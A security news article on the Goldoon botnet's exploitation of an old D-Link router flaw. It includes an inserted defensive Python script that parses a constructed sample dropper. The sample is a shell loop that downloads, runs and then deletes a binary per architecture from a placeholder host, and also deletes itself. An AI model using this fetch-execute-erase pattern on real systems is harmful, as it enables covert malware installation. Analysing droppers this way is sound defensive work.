A never-before-seen botnet called Goldoon has been observed targeting D-Link routers with a nearly decade-old critical security flaw with the goal of using the compromised devices for further attacks.

The vulnerability in question is CVE-2015-2051 (CVSS score: 9.8), which affects D-Link DIR-645 routers and allows remote attackers to execute arbitrary commands by means of specially crafted HTTP requests.

“If a targeted device is compromised, attackers can gain complete control, enabling them to extract system information, establish communication with a C2 server, and then use these devices to launch further attacks, such as distributed denial-of-service (DDoS),” Fortinet FortiGuard Labs researchers Cara Lin and Vincent Li said.

Telemetry data from the network security company points to a spike in the botnet activity around April 9, 2024.

The attack chain begins with the exploitation of CVE-2015-2051 to retrieve a dropper script from a remote server, which is responsible for downloading the next-stage payload for different Linux system architectures, including aarch64, arm, i686, m68k, mips64, mipsel, powerpc, s390x, sparc64, x86-64, sh4, riscv64, DEC Alpha, and PA-RISC.

The payload is subsequently launched on the compromised device and acts as a downloader for the Goldoon malware from a remote endpoint, after which the dropper removes the executed file and then deletes itself in a bid to cover up the trail and fly under the radar.
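The dropper behaviour described above lends itself to quick static triage of a captured script. The following Python is an added example, not code from the FortiGuard write-up or from the Goldoon sample itself: it runs over a constructed dropper that mirrors the described chain (per-architecture fetch, execute, remove the binary, delete itself), extracts the download host, the architecture list and the cleanup steps, and expands the per-architecture URL template into concrete indicators suitable for blocking. The host dropper.example.invalid, the file names and the exact shell phrasing are assumptions; a real dropper will differ, and the regexes only cover the plain wget/curl, chmod and rm idiom.

```python
"""Static triage of a multi-architecture dropper script (added example).

The dropper text is CONSTRUCTED to mirror the behaviour the article describes;
it is not the real Goldoon dropper. Hostname and file names are placeholders.
"""
import re
from urllib.parse import urlparse

# Architecture names as they appear in the article, normalised to the tokens a
# shell dropper typically uses (assumption: "DEC Alpha" -> alpha, "PA-RISC" -> hppa).
KNOWN_ARCHES = {
    "aarch64", "arm", "i686", "m68k", "mips64", "mipsel", "powerpc", "s390x",
    "sparc64", "x86_64", "x86-64", "sh4", "riscv64", "alpha", "hppa",
}

# Constructed sample: fetch one binary per architecture, run it, remove it, then self-delete.
SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
for a in aarch64 arm i686 m68k mips64 mipsel powerpc s390x sparc64 x86_64 sh4 riscv64 alpha hppa; do
    wget -q http://dropper.example.invalid/bins/stage2.$a -O stage2.$a
    chmod +x stage2.$a
    ./stage2.$a
    rm -f stage2.$a
done
rm -f "$0"
"""

FOR_RE = re.compile(r"\bfor\s+(\w+)\s+in\s+([^;\n]+)")
FETCH_RE = re.compile(r"""\b(?:wget|curl)\b[^\n]*?(https?://[^\s'\"]+)""")
CHMOD_RE = re.compile(r"\bchmod\s+\+x\s+(\S+)")
RM_RE = re.compile(r"\brm\s+(?:-\w+\s+)*([^\s;&|]+)")
SELF_DELETE_RE = re.compile(r"""\brm\s+(?:-\w+\s+)*[\"']?\$(?:0|\{0\})[\"']?""")


def triage_dropper(script: str) -> dict:
    """Summarise what a dropper fetches, which architectures it targets, and how it cleans up."""
    loop = FOR_RE.search(script)
    loop_var, arches = None, []
    if loop:
        loop_var = loop.group(1)
        # Keep only tokens that look like architecture names; ignore other loop lists.
        arches = [tok for tok in loop.group(2).split() if tok in KNOWN_ARCHES]

    urls = FETCH_RE.findall(script)
    hosts = sorted({urlparse(u).netloc for u in urls})

    # Payload removal: something made executable is later passed to rm.
    executables = set(CHMOD_RE.findall(script))
    removed = set(RM_RE.findall(script))

    return {
        "loop_var": loop_var,
        "arches": arches,
        "urls": urls,
        "hosts": hosts,
        "removes_payload": bool(executables & removed),
        "self_delete": bool(SELF_DELETE_RE.search(script)),
    }


def expand_urls(report: dict) -> list:
    """Turn a URL containing the loop variable into one concrete URL per architecture."""
    var = report["loop_var"]
    concrete = []
    for url in report["urls"]:
        if var and (f"${var}" in url or f"${{{var}}}" in url):
            for arch in report["arches"]:
                concrete.append(url.replace(f"${{{var}}}", arch).replace(f"${var}", arch))
        else:
            concrete.append(url)
    return concrete


if __name__ == "__main__":
    report = triage_dropper(SAMPLE_DROPPER)
    print(f"hosts: {report['hosts']}")
    print(f"architectures ({len(report['arches'])}): {' '.join(report['arches'])}")
    print(f"removes payload: {report['removes_payload']}, self-deletes: {report['self_delete']}")
    for ioc in expand_urls(report):
        print("  ", ioc)
```

The two cleanup flags are the part worth keeping an eye on during incident response: a dropper that removes its stage-two binary and then itself leaves little on disk, so the evidence is the fetched URLs in web or proxy logs and the running process, not a file to hash.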

Any attempt to access the endpoint directly via a web browser displays the error message: “Sorry, you are an FBI Agent & we can’t help you 🙁 Go away or I will kill you :)”

Goldoon, besides setting up persistence on the host using various autorun methods, establishes contact with a command-and-control (C2) server to await commands for follow-up actions.

This includes an “astounding 27 different methods” to pull off DDoS flood attacks using various protocols like DNS, HTTP, ICMP, TCP, and UDP.

“While CVE-2015-2051 is not a new vulnerability and presents a low attack complexity, it has a critical security impact that can lead to remote code execution,” the researchers said.

The development comes as botnets continue to evolve and exploit as many devices as possible, even as cybercriminals and advanced persistent threat (APT) actors alike have demonstrated an interest in compromised routers for use as an anonymization layer.

“Cybercriminals rent out compromised routers to other criminals, and most likely also make them available to commercial residential proxy providers,” cybersecurity company Trend Micro said in a report.

“Nation-state threat actors like Sandworm used their own dedicated proxy botnets, while APT group Pawn Storm had access to a criminal proxy botnet of Ubiquiti EdgeRouters.”
